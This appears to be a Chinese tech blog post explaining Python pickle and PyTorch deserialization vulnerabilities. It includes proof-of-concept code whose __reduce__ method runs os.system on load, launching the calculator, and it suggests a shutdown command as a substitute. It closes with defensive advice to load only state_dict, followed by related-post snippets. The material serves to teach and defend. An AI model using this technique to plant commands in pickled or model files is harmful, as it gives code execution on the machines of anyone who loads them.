【Python】Pickle/PyTorch反序列化漏洞

最新推荐文章于 2025-07-12 09:14:21 发布
原创 最新推荐文章于 2025-07-12 09:14:21 发布 · 1.6k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #pytorch #深度学习

文章探讨了Python的Pickle库在反序列化过程中可能存在的安全风险,特别是通过__reduce__方法执行恶意代码。示例展示了如何利用这个漏洞打开计算器,甚至执行更危险的系统命令。PyTorch模型的加载也存在类似问题,但仅保存和加载模型参数可以避免这种风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

有人说,不要轻易加载未知来源的模型,否则存在反序列化攻击的风险,本文就对此言论进行测试分析。

Pickle反序列化漏洞

通常情况下,会用到Pickle来将一些变量/对象转换成字节串进行存储,此操作称为序列化
读取pkl文件,还原其中的数据,此操作称为反序列化

而在Python中,有一个天然的魔法方法__reduce__,它在进行反序列化中,会自动执行其下的内容,这就造成了一个可被用于攻击的漏洞。

__reduce__方法主要有两种方式,返回字符串或者返回元组,后者可携带一些操作指令。
具体的解释可参考官方文档:https://docs.python.org/3/library/pickle.html

下面看一个示例:

import os
import pickle


class Test(object):
    def __init__(self):
        self.a = 1
        self.b = '2'
        self.c = '3'

    def __reduce__(self):
        return (os.system, ('calc.exe',))


if __name__ == '__main__':
    aa = Test()
    with open("model.pkl", "wb") as f:
        pickle.dump(aa, f, protocol=0)
    with open("model.pkl", "rb") as f:
        A = pickle.load(f)

运行本示例,会发现计算器会被打开,这是因为在反序列化的过程中,执行了'calc.exe'。相当于直接在控制台中输入calc.exe,从而打开计算器。

这个指令可以替换成任何命令,比如shutdown -s -t 0,这样当进行反序列操作后,会直接关机。

PyTorch反序列化漏洞

Pytorch的模型保存和加载底层依然是用到了Pickle,因此同样存在反序列化的漏洞。

下面是个示例:
首先定义一个简单的DNN模型:

import torch
import torch.nn as nn
import torch.nn.functional as F
import os

class Net(nn.Module):
    def __init__(self):
        super(Net, self).__init__()
        self.layer1 = nn.Linear(1, 128)
        self.layer2 = nn.Linear(128, 128)
        self.layer3 = nn.Linear(128, 2)

    def forward(self, x):
        x = F.relu(self.layer1(x))
        x = F.relu(self.layer2(x))
        action = self.layer3(x)
        return action

    def __reduce__(self):
        return (os.system, ('calc.exe',))

然后保存模型,再进行加载:

if __name__ == '__main__':
    a = Net()
    torch.save(a, '12.pt')
    b = torch.load('12.pt')

运行之后,同样可以发现计算器被打开。

上面的方法是保存整个模型,再进行加载。另一种模型保存和加载的方式是仅保存和加载模型的参数。

if __name__ == '__main__':
    a = Net()
    torch.save(a.state_dict(), '12.pt')
    c = Net()
    c.load_state_dict(torch.load('12.pt'))

运行该方法,发现计算器没有被打开。

总结

  1. 加载模型时,尽可能不要加载整个模型,否则存在反序列化风险,加载模型参数则不存在风险。
  2. Pickle反序列化风险避免方式比较复杂,可以通过黑白名单禁用R指令等方式,更详细的内容可参考https://zhuanlan.zhihu.com/p/89132768
详解python pickle中的反序列化漏洞
公众号:该用户快成仙了
06-24 1493
反序列化过程有漏洞:如果我们反序列化了一个不可信的数据源,那就可能引发反序列化攻击攻击者可以在序列化的数据里嵌入恶意代码,当你反序列化这个数据时,这些恶意代码就会被执行,可能会导致数据泄露、系统崩溃,甚至让攻击者远程控制你的系统。Pickle模块是Python自带的,它主要用来序列化和反序列化Python对象。你可以用Pickle把任何Python对象(包括复杂的数据结构)保存成字节流,然后在需要的时候再加载回来。Pickle的工作原理Pickle的工作原理其实很简单。
Python反序列化漏洞(入门)
xiaoheizi的博客
07-02 646
_reduce__()魔术方法,魔术方法中执行了传递的参数,参数意思是:执行调用计算器的系统命令。__reduce__()和__reduce_ex__()魔术方法:对象被反序列化时自动调用。__setstate__()魔术方法:对象被反序列化时自动调用。__getstate__()魔术方法: 对象被序列化时自动调用。读取文件, 将文件中的序列化内容反序列化为对象。安装后会在当前Python目录下script。将字符串格式的字节流反序列化为对象。安装后会在当前Python目录下。parseObject等。
python pickle反序列化漏洞
weixin_43610673的博客
05-20 3622
前置知识 什么是pickle picklePython专用的一个进行序列化和反序列化的工具包,pickle能表示Python几乎所有的类型(包括自定义类型),由一系列opcode组成,模拟了类似堆栈的内存。 与PHP序列化或者JSON,这些以键值对形式存储序列化对象数据的不同,pickle 序列化(Python独有)是将一个 Python 对象及其所拥有的层次结构变成可以持久化储存的二进制数据,无法像JSON 一样直观阅读。在Python中,采用术语 封存 (pickling)和 解封 (unpickli
PyTorch‘s ‘Safe Mode‘ torch.load Wasn‘t So Safe After All
最新发布
平安喜乐
07-12 699
问题是什么?CVE-2025-32434是PyTorch 2.5.1及以下版本中的一个远程代码执行(RCE)漏洞。它是如何运作的?即使使用所谓的“安全”函数,使用旧格式精心构造的恶意模型文件也能绕过安全检查并执行任意代码。可能是高到严重(CVSS分数待定,但RCE通常是很严重的问题)。立即升级PyTorch到2.6.0或更高版本(
Python Pickle 反序列化漏洞
qq_46001025的博客
10-05 452
需要注意的一点:注意:对于我们自己定义的class,如果直接以 data=‘aaa’ 的方式赋初值,则这个date不会被打包,解决方案是写一个__init__()方法。python反序列化漏洞的产生和php的魔术方法有异曲同工之处,在Python2中的 __reduce__() 方法,会在每次的反序列化开始或结束时调用。字节码,如果python有写入的权限,那么会生成一个 .pyc 的字节码文件,若没有那就再内存中生成字节码,程序结束后丢弃。(以下称为机器吧)维护了两个东西:栈区和存储区。
[python]pickle反序列化漏洞(未完结)
山可行,海可平
03-29 5596
基础知识 实现:pickle或cpickle,二者仅实现语言不同(前纯python,后C),而cPickle性能更好 pickle库 标注库,实现了数据序列化和反序列化 pickle模块是以二进制的形式序列化后保存到文件(后缀:.pkl),不能直接打开 序列化后字符串的表意、序列化的规则->PVM(python序列化和反序列化过程最根本的) PVM 解释字节码的解释引擎 执行流程 PVM将源码编译成字节码 python将编译好的字节码转发到PVM(python虚拟机),PVM循环迭代执行字节码指令
python安全之Pickle反序列化漏洞学习。
Mrs_H的博客
10-28 2560
前言 写这篇文章的起因是两次遇到python pickle的题目都只做到了命令执行的程度,但都没有反弹shell。看别人的wp都是通过curl将flag拉到vps上的,怎么说呢,死于没有公网IP。虽然之前在做题的时候,照着网上的exp可以把自己的payload改个七七八八,但是说实话我距离真正意义上的“手撸”opcode还是有着一段距离。这篇文章主要还是通过我所遇到的pickle反序列化题目出发进行编写,当然也少不了pickle的原理部分。 正文 在正式开始这篇文章之前,我想先贴出一位大佬的文章Pion1e
【WEB安全】不安全的反序列化
weixin_43025534的博客
05-23 1653
序列化和反序列化是指用于将对象或数据结构转换为字节流的过程,以便在不同系统之间进行传输或存储,并在需要时重新构造。**序列化是指将对象或数据结构转换为字节流的过程。**在序列化过程中,对象的状态和数据被转换为一系列字节,这些字节可以按照一定的协议进行传输或存储。序列化通常用于将对象存储到磁盘或通过网络发送到其他系统。序列化后的字节流可以被保存下来,以后可以通过反序列化操作重新构建对象并恢复其状态和数据。**反序列化是指将序列化后的字节流转换回对象或数据结构的过程。
Check the documentation of torch.load to learn more about types accepted by default with weights_only https://pytorch.org/docs/stable/generated/torch.load.html.
03-13
该方法默认支持多种数据类型的反序列化操作,主要包括但不限于以下几种: - **Tensor 类型**: 可以通过 `torch.load` 加载由 `torch.save` 序列化的张量。 - **Python 原生数据结构**: 如列表、字典、元组等可以被...
pycharm中指针型数据识别异常且出现Check the documentation of torch.load to learn more about types accepted by default with weights_only https://pytorch.org/docs/stable/generated/torch.load.html. None怎么解决
05-31
首先,torch.load在加载模型时,默认会允许反序列化所有对象,这可能存在安全隐患。特别是当模型包含用户自定义的类或函数时,PyTorch需要能够访问这些类的定义才能正确加载。如果用户的环境中没有这些定义,或者...
Pythonpickle模块的dump()和load()方法
weixin_45928096的博客
11-24 1485
python中的pickle模块,一个对象可以被序列化到文件中,然后可以从文件中恢复。
python反序列化漏洞 任意代码执行
01-20
上一篇博客中我介绍了python的字符串,元组,列表和字典的序列化 详细请看: python序列化中的字符串,列表,字典,类的序列化解释 这篇博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化中运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实现任意代码执行 举个例子: import pickle import os class Student(object): name = 'yuaneuro' age = '20' def __reduce__(self):
torch.load Python pickle 反序列化能并行吗
05-28
好的,用户想知道在使用torch.load和Pythonpickle进行反序列化时能否实现并行... - Windows的多进程`spawn`启动方式要求所有参数必须可序列化,建议将反序列化操作封装在子进程函数内部以减少跨进程对象传递[^3]。 ---
python pickle反序列化漏洞_Python Pickle反序列化漏洞
weixin_39635432的博客
12-08 341
Python序列化与反序列化Python 的序列化和反序列化是将一个类对象向字节流转化从而进行存储和传输,然后使用的时候再将字节流转化回原始的对象的一个过程几个重要函数Pickle.dump():将Python对象序列化保存到本地的文件中。Pickle.load():载入本地文件,将文件内容反序列化Python对象。Pickle.dumps():将Python对象序列化为字符串。Pickle.l...
python pickle反序列化漏洞_Python反序列化漏洞
weixin_39745013的博客
12-08 333
1、什么是序列化和php的序列化一样,是把string,字典,数组,类这些数据当作字节储存2、picklepickle.dumps()和pickle.loads() 分别是序列化和反序列化pickle.dump()和pickle.load是对文件的写入import picklex= 'cccccc'y = [1,2,3,4]z = {'name':'hzx','pass':'zzz'}print(...
Python Pickle反序列化漏洞
Lemon's blog
11-15 4883
前言: 刷题的时候做了一道[CISCN2019]ikun的题目,提示考察的知识点是Python Pickle,之前接触的都是有关PHP反序列化,这次就来好好学习一下Python Pickle反序列化漏洞。 基础知识 0x00:Pickle库及函数 picklepython语言的一个标准模块,实现了基本的数据序列化和反序列化pickle模块是以二进制的形式序列化后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列化为bytes对象
python pickle反序列化漏洞_Python反序列化安全问题
weixin_39997194的博客
12-08 547
Python 反序列化安全问题(一)这一段时间使用flask做web开发,使用了redis存储session,阅读了flask_session源码,发现在存储session到redis过程中,利用了cPickle模块进行序列化以及反序列化;正好根据该样例学习一波Python反序列化相关的安全问题,不足之处请各位表哥指出。一、基础知识讲解1.1 cPickle模块Python中主要是用cPickle...
python pickle漏洞
weixin_44687621的博客
07-27 746
python反序列化漏洞 1.使用pickle库对对象进行序列化和反序列化操作 json反序列化 import json dict={"admin":"123"} json_info = json.dumps(dict) print(str(type(json_info))+json_info) dict1=json.loads(json_info) print(str(type(dict1))) print(dict) pickle反序列化 import pickle class Test:
Pytorch对机器学习模型的安全漏洞攻击方法之Fast Gradient Sign Attack(FGSM,快速梯度符号攻击)
深度学习领域优质创作者,CSDN博客专家
04-23 1707
主要就是熟悉机器学习模型的攻击和防御,安全这块还是需要特别重视
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

zstar-_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值